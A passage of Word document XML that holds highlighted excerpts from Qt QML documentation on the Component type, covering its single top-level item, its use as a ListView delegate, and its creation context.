          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the same way</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">definition </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains a single top level item</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which in the above example is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1494" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) and cannot define any data outside of this item, with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exception of an</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(which in the above example is</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redSquare</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>commonly used to provide graphical components for views</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1495" w:anchor="delegate-prop" w:history="1">
        <w:r w:rsidRPr="00E3656D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView::delegate</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property requires a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to specify how each list item is to be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects can also be created dynamically using</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1496" w:anchor="createComponent-method" w:history="1">
        <w:r w:rsidRPr="00E3656D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createComponent()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1200" w:name="creation-context"/>
      <w:bookmarkStart w:id="1201" w:name="_Toc483000780"/>
      <w:bookmarkStart w:id="1202" w:name="_Toc483003778"/>
      <w:bookmarkStart w:id="1203" w:name="_Toc483604132"/>
      <w:bookmarkStart w:id="1204" w:name="_Toc483605352"/>
      <w:bookmarkEnd w:id="1200"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creation Context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1201"/>
      <w:bookmarkEnd w:id="1202"/>
      <w:bookmarkEnd w:id="1203"/>
      <w:bookmarkEnd w:id="1204"/>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creation context</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Component </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>corresponds to the context where the Component was declared</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This context is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>used as the parent context</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (creating a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1497" w:anchor="component-instance-hierarchy" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>context hierarchy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) when the component is instantiated by an object such as a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1498" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or a Loader.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comp1</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is created within the root context of MyItem.qml, and any objects instantiated from this component </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3656D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will have access to the ids and properties within that context</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internalSettings.color</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. When</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comp1</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is used as a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1499" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate in another context (as in main.qml below), it will continue to have access to the properties of its creation context (which would otherwise be private to external users).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1429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427"/>
        <w:gridCol w:w="11868"/>
      </w:tblGrid>
      <w:tr w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidTr="00A50E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2427"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797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MyItem.qml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11868"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797B11" w:rsidRPr="00797B11" w:rsidRDefault="00490E7E">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500" w:history="1">
              <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Item</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
